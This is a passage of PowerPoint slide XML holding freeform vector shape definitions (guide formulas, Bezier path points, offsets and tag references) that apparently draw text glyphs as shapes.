                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="29" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="31"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="185" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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4" name="Freeform 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9025ACB0-A013-4AC6-9610-B4A1DBA4F459}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2552700" y="984250"/>
              <a:ext cx="90488" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 236"/>
                <a:gd name="T1" fmla="*/ 31 h 329"/>
                <a:gd name="T2" fmla="*/ 216 w 236"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 236 w 236"/>
                <a:gd name="T5" fmla="*/ 16 h 329"/>
                <a:gd name="T6" fmla="*/ 216 w 236"/>
                <a:gd name="T7" fmla="*/ 0 h 329"/>
                <a:gd name="T8" fmla="*/ 158 w 236"/>
                <a:gd name="T9" fmla="*/ 0 h 329"/>
                <a:gd name="T10" fmla="*/ 138 w 236"/>
                <a:gd name="T11" fmla="*/ 15 h 329"/>
                <a:gd name="T12" fmla="*/ 158 w 236"/>
                <a:gd name="T13" fmla="*/ 31 h 329"/>
                <a:gd name="T14" fmla="*/ 172 w 236"/>
                <a:gd name="T15" fmla="*/ 31 h 329"/>
                <a:gd name="T16" fmla="*/ 136 w 236"/>
                <a:gd name="T17" fmla="*/ 137 h 329"/>
                <a:gd name="T18" fmla="*/ 123 w 236"/>
                <a:gd name="T19" fmla="*/ 180 h 329"/>
                <a:gd name="T20" fmla="*/ 122 w 236"/>
                <a:gd name="T21" fmla="*/ 180 h 329"/>
                <a:gd name="T22" fmla="*/ 112 w 236"/>
                <a:gd name="T23" fmla="*/ 150 h 329"/>
                <a:gd name="T24" fmla="*/ 65 w 236"/>
                <a:gd name="T25" fmla="*/ 31 h 329"/>
                <a:gd name="T26" fmla="*/ 78 w 236"/>
                <a:gd name="T27" fmla="*/ 31 h 329"/>
                <a:gd name="T28" fmla="*/ 98 w 236"/>
                <a:gd name="T29" fmla="*/ 16 h 329"/>
                <a:gd name="T30" fmla="*/ 78 w 236"/>
                <a:gd name="T31" fmla="*/ 0 h 329"/>
                <a:gd name="T32" fmla="*/ 20 w 236"/>
                <a:gd name="T33" fmla="*/ 0 h 329"/>
                <a:gd name="T34" fmla="*/ 0 w 236"/>
                <a:gd name="T35" fmla="*/ 16 h 329"/>
                <a:gd name="T36" fmla="*/ 20 w 236"/>
                <a:gd name="T37" fmla="*/ 31 h 329"/>
                <a:gd name="T38" fmla="*/ 35 w 236"/>
                <a:gd name="T39" fmla="*/ 31 h 329"/>
                <a:gd name="T40" fmla="*/ 106 w 236"/>
                <a:gd name="T41" fmla="*/ 209 h 329"/>
                <a:gd name="T42" fmla="*/ 108 w 236"/>
                <a:gd name="T43" fmla="*/ 215 h 329"/>
                <a:gd name="T44" fmla="*/ 89 w 236"/>
                <a:gd name="T45" fmla="*/ 269 h 329"/>
                <a:gd name="T46" fmla="*/ 49 w 236"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 51 w 236"/>
                <a:gd name="T49" fmla="*/ 287 h 329"/>
                <a:gd name="T50" fmla="*/ 30 w 236"/>
                <a:gd name="T51" fmla="*/ 266 h 329"/>
                <a:gd name="T52" fmla="*/ 8 w 236"/>
                <a:gd name="T53" fmla="*/ 288 h 329"/>
                <a:gd name="T54" fmla="*/ 49 w 236"/>
                <a:gd name="T55" fmla="*/ 329 h 329"/>
                <a:gd name="T56" fmla="*/ 124 w 236"/>
                <a:gd name="T57" fmla="*/ 257 h 329"/>
                <a:gd name="T58" fmla="*/ 201 w 236"/>
                <a:gd name="T59" fmla="*/ 3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6" h="329">
                  <a:moveTo>
                    <a:pt x="201" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="31"/>
                    <a:pt x="236" y="31"/>
                    <a:pt x="236" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="224" y="0"/>
                    <a:pt x="216" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="138" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="31"/>
                    <a:pt x="150" y="31"/>
                    <a:pt x="158" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="155"/>
                    <a:pt x="126" y="164"/>
                    <a:pt x="123" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="170"/>
                    <a:pt x="115" y="160"/>
                    <a:pt x="112" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="31"/>
                    <a:pt x="98" y="31"/>
                    <a:pt x="98" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="209"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="214"/>
                    <a:pt x="108" y="215"/>
                    <a:pt x="108" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="216"/>
                    <a:pt x="95" y="257"/>
                    <a:pt x="89" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="297"/>
                    <a:pt x="56" y="298"/>
                    <a:pt x="49" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="298"/>
                    <a:pt x="51" y="294"/>
                    <a:pt x="51" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="275"/>
                    <a:pt x="42" y="266"/>
                    <a:pt x="30" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="266"/>
                    <a:pt x="8" y="275"/>
                    <a:pt x="8" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="309"/>
                    <a:pt x="25" y="329"/>
                    <a:pt x="49" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="329"/>
                    <a:pt x="122" y="263"/>
                    <a:pt x="124" y="257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="201" y="3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5" name="Freeform 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB23091F-D57F-444D-A324-AADAB78AA133}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1646237" y="1182688"/>
              <a:ext cx="88900" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 230"/>
                <a:gd name="T1" fmla="*/ 125 h 315"/>
                <a:gd name="T2" fmla="*/ 210 w 230"/>
                <a:gd name="T3" fmla="*/ 125 h 315"/>
                <a:gd name="T4" fmla="*/ 230 w 230"/>
                <a:gd name="T5" fmla="*/ 111 h 315"/>
                <a:gd name="T6" fmla="*/ 210 w 230"/>
                <a:gd name="T7" fmla="*/ 95 h 315"/>
                <a:gd name="T8" fmla="*/ 164 w 230"/>
                <a:gd name="T9" fmla="*/ 95 h 315"/>
                <a:gd name="T10" fmla="*/ 144 w 230"/>
                <a:gd name="T11" fmla="*/ 110 h 315"/>
                <a:gd name="T12" fmla="*/ 165 w 230"/>
                <a:gd name="T13" fmla="*/ 125 h 315"/>
                <a:gd name="T14" fmla="*/ 121 w 230"/>
                <a:gd name="T15" fmla="*/ 230 h 315"/>
                <a:gd name="T16" fmla="*/ 85 w 230"/>
                <a:gd name="T17" fmla="*/ 161 h 315"/>
                <a:gd name="T18" fmla="*/ 135 w 230"/>
                <a:gd name="T19" fmla="*/ 68 h 315"/>
                <a:gd name="T20" fmla="*/ 89 w 230"/>
                <a:gd name="T21" fmla="*/ 0 h 315"/>
                <a:gd name="T22" fmla="*/ 37 w 230"/>
                <a:gd name="T23" fmla="*/ 72 h 315"/>
                <a:gd name="T24" fmla="*/ 51 w 230"/>
                <a:gd name="T25" fmla="*/ 153 h 315"/>
                <a:gd name="T26" fmla="*/ 17 w 230"/>
                <a:gd name="T27" fmla="*/ 189 h 315"/>
                <a:gd name="T28" fmla="*/ 0 w 230"/>
                <a:gd name="T29" fmla="*/ 242 h 315"/>
                <a:gd name="T30" fmla="*/ 61 w 230"/>
                <a:gd name="T31" fmla="*/ 315 h 315"/>
                <a:gd name="T32" fmla="*/ 123 w 230"/>
                <a:gd name="T33" fmla="*/ 281 h 315"/>
                <a:gd name="T34" fmla="*/ 181 w 230"/>
                <a:gd name="T35" fmla="*/ 315 h 315"/>
                <a:gd name="T36" fmla="*/ 229 w 230"/>
                <a:gd name="T37" fmla="*/ 258 h 315"/>
                <a:gd name="T38" fmla="*/ 215 w 230"/>
                <a:gd name="T39" fmla="*/ 241 h 315"/>
                <a:gd name="T40" fmla="*/ 201 w 230"/>
                <a:gd name="T41" fmla="*/ 257 h 315"/>
                <a:gd name="T42" fmla="*/ 181 w 230"/>
                <a:gd name="T43" fmla="*/ 285 h 315"/>
                <a:gd name="T44" fmla="*/ 139 w 230"/>
                <a:gd name="T45" fmla="*/ 256 h 315"/>
                <a:gd name="T46" fmla="*/ 165 w 230"/>
                <a:gd name="T47" fmla="*/ 203 h 315"/>
                <a:gd name="T48" fmla="*/ 195 w 230"/>
                <a:gd name="T49" fmla="*/ 125 h 315"/>
                <a:gd name="T50" fmla="*/ 73 w 230"/>
                <a:gd name="T51" fmla="*/ 128 h 315"/>
                <a:gd name="T52" fmla="*/ 65 w 230"/>
                <a:gd name="T53" fmla="*/ 72 h 315"/>
                <a:gd name="T54" fmla="*/ 89 w 230"/>
                <a:gd name="T55" fmla="*/ 30 h 315"/>
                <a:gd name="T56" fmla="*/ 107 w 230"/>
                <a:gd name="T57" fmla="*/ 68 h 315"/>
                <a:gd name="T58" fmla="*/ 73 w 230"/>
                <a:gd name="T59" fmla="*/ 128 h 315"/>
                <a:gd name="T60" fmla="*/ 63 w 230"/>
                <a:gd name="T61" fmla="*/ 184 h 315"/>
                <a:gd name="T62" fmla="*/ 83 w 230"/>
                <a:gd name="T63" fmla="*/ 220 h 315"/>
                <a:gd name="T64" fmla="*/ 105 w 230"/>
                <a:gd name="T65" fmla="*/ 256 h 315"/>
                <a:gd name="T66" fmla="*/ 62 w 230"/>
                <a:gd name="T67" fmla="*/ 285 h 315"/>
                <a:gd name="T68" fmla="*/ 34 w 230"/>
                <a:gd name="T69" fmla="*/ 240 h 315"/>
                <a:gd name="T70" fmla="*/ 63 w 230"/>
                <a:gd name="T71" fmla="*/ 18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0" h="315">
                  <a:moveTo>
                    <a:pt x="195" y="125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210" y="125"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="125"/>
                    <a:pt x="230" y="125"/>
                    <a:pt x="230" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="95"/>
                    <a:pt x="218" y="95"/>
                    <a:pt x="210" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="95"/>
                    <a:pt x="144" y="95"/>
                    <a:pt x="144" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="125"/>
                    <a:pt x="156" y="125"/>
                    <a:pt x="165" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="161"/>
                    <a:pt x="135" y="204"/>
                    <a:pt x="121" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="220"/>
                    <a:pt x="95" y="188"/>
                    <a:pt x="85" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="109"/>
                    <a:pt x="135" y="80"/>
                    <a:pt x="135" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="38"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="37" y="22"/>
                    <a:pt x="37" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="94"/>
                    <a:pt x="41" y="122"/>
                    <a:pt x="51" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="157"/>
                    <a:pt x="18" y="189"/>
                    <a:pt x="17" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="201"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="23" y="315"/>
                    <a:pt x="61" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="315"/>
                    <a:pt x="108" y="300"/>
                    <a:pt x="123" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="290"/>
                    <a:pt x="152" y="315"/>
                    <a:pt x="181" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="315"/>
                    <a:pt x="229" y="282"/>
                    <a:pt x="229" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="241"/>
                    <a:pt x="216" y="241"/>
                    <a:pt x="215" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="241"/>
                    <a:pt x="201" y="254"/>
                    <a:pt x="201" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="279"/>
                    <a:pt x="189" y="285"/>
                    <a:pt x="181" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="285"/>
                    <a:pt x="144" y="262"/>
                    <a:pt x="139" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="239"/>
                    <a:pt x="160" y="216"/>
                    <a:pt x="165" y="203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="103"/>
                    <a:pt x="65" y="76"/>
                    <a:pt x="65" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="43"/>
                    <a:pt x="78" y="30"/>
                    <a:pt x="89" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="107" y="64"/>
                    <a:pt x="107" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="83"/>
                    <a:pt x="98" y="101"/>
                    <a:pt x="73" y="128"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="192"/>
                    <a:pt x="76" y="209"/>
                    <a:pt x="83" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="240"/>
                    <a:pt x="97" y="244"/>
                    <a:pt x="105" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="283"/>
                    <a:pt x="69" y="285"/>
                    <a:pt x="62" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="285"/>
                    <a:pt x="34" y="254"/>
                    <a:pt x="34" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="216"/>
                    <a:pt x="40" y="210"/>
                    <a:pt x="63" y="18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6" name="Freeform 117">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0440E3F-3D68-453B-9D4F-D86FC59BFC6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1747837" y="1184275"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 238"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 181 w 238"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 238"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 238 w 238"/>
                <a:gd name="T7" fmla="*/ 290 h 308"/>
                <a:gd name="T8" fmla="*/ 218 w 238"/>
                <a:gd name="T9" fmla="*/ 275 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 238"/>
                <a:gd name="T11" fmla="*/ 275 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 238"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 238"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139 w 238"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 119 w 238"/>
                <a:gd name="T19" fmla="*/ 16 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 238"/>
                <a:gd name="T21" fmla="*/ 31 h 308"/>
                <a:gd name="T22" fmla="*/ 161 w 238"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 161 w 238"/>
                <a:gd name="T25" fmla="*/ 110 h 308"/>
                <a:gd name="T26" fmla="*/ 103 w 238"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 238"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 238"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 161 w 238"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 161 w 238"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 161 w 238"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 238"/>
                <a:gd name="T39" fmla="*/ 278 h 308"/>
                <a:gd name="T40" fmla="*/ 35 w 238"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 105 w 238"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 161 w 238"/>
                <a:gd name="T45" fmla="*/ 17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8" h="308">
                  <a:moveTo>
                    <a:pt x="161" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="298"/>
                    <a:pt x="161" y="305"/>
                    <a:pt x="181" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="305"/>
                    <a:pt x="238" y="305"/>
                    <a:pt x="238" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="275"/>
                    <a:pt x="225" y="275"/>
                    <a:pt x="218" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="0"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="31"/>
                    <a:pt x="131" y="31"/>
                    <a:pt x="138" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="124" y="87"/>
                    <a:pt x="103" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="260"/>
                    <a:pt x="45" y="308"/>
                    <a:pt x="98" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="308"/>
                    <a:pt x="147" y="295"/>
                    <a:pt x="161" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="161" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="236"/>
                    <a:pt x="138" y="278"/>
                    <a:pt x="100" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="278"/>
                    <a:pt x="35" y="242"/>
                    <a:pt x="35" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="150"/>
                    <a:pt x="70" y="117"/>
                    <a:pt x="105" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="161" y="145"/>
                    <a:pt x="161" y="17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7" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{073D32A9-3A77-471B-9110-C3DC702FE569}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1852612" y="1219200"/>
              <a:ext cx="77788" cy="87313"/>
